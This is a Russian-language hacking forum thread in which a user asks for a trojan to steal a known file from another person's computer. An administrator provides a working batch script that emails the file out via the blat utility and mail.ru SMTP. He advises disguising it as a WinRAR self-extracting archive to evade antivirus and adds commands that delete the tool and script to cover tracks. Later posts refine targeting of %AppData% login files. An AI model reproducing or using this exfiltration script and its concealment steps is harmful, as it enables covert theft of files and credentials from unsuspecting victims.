• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

Кто знает троян для похищения файлов (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
429
Репутация
130
Всем привет, недавно понадобилось стащить один файл с компьютера.
Я знаю точное месторасположение файла его название и расширение, но никак не могу найти нигде нормальный троян этот или аналогчиный, (скрин внизу) если есть у кого, поделитесь пожалуйста :D.

https://ru-sfera.org/data/MetaMirrorCache/s45.radikal.ru_i110_1008_17_8713fb2d0b52.jpg
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 399
Репутация
7 885
Telegram
Предлагаю сделать самому при помощи батника, но понадобится специальная утилита blat !

Вот пример батника с прогой blat отправки файл через mail.ru:

Код:
@echo on
set eMail=my@mydomain.ru
set femail=myemail*********
set subj=-s "TEMA PISMA"
set server=-server smtp.mail.ru
set username=myemail
set password=mypassword
set debug=-debug -log blat.log -timestamp
set file=cube.log
 
blat bodytxt -to %eMail% -f %femail% -u %username% -pw %password% %subj% %server% -attacht %file%
pause

-------
eMail - кому
femail - от какого ящика на mail.ru отправляется
в body.txt можно поместить текст письма
cube.log - отправляемый файл
-attacht - означает отправка текстового файла
-attach - бинарного файла

Вместо cube.log вписать можно любой файл...

Склеить в экзешник можно при помощи самораспаковывающиеся архива, также можно замоскировать его под любой файл, рекомендую делать в винраре, т.к. его не палит АВ, удачи ! ;)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 399
Репутация
7 885
Telegram
а как там указывать ну путь к файлу
Ну тут два варианта, первый если будешь маскировать в самораспаковывающийся архив, то достаточно распакавать в папку с нужным файлом и он его подцепит...

Второй вариант, вот так set file=C:\cube.log

Ну и не забывать про:
-attacht - означает отправка текстового файла
-attach - бинарного файла
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 399
Репутация
7 885
Telegram
Забыл сказать, не забывайте заметать следы, т.е. удаления всего этого дела после отправки, пример:
Код:
DEL /F /Q "Blat.exe" #Удалит blat.exe
Del /F /Q %0 #Удалит наш батник
Как-то так ! ;)
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
429
Репутация
130
Спасибо большое завтра буду тестировать :D
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
429
Репутация
130
А надо что бы у пользователя утилита blat стояла? Ну на компьютере? Или это как компилятор делает автономные exe'шники
----
А вот нашел
rem *** Путь к программе blat.exe ***
set file_blat=D:\blat\blat.exe
Как я понял надо склеивать винраром батник с blat.exe и указывать месторасположение
---------
chdir c:\win32 вставил вначале батника (путь к распакованной утилите), либо распаковывать в одну директорию
ну и опечатка у тебя в коде
blat body.txt -to %eMail% -f %femail% -u %username% -pw %password% %subj% %server% -attacht %file%
если кто-то будет пользоваться там точки нет :D
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
429
Репутация
130
Ну все вроде работает, но вот допустим если указываю путь C:\login все нормально качает
А если %AppData%/Roaming/login то не работает, подскажите что не так :D может из-за имени пользователя русского?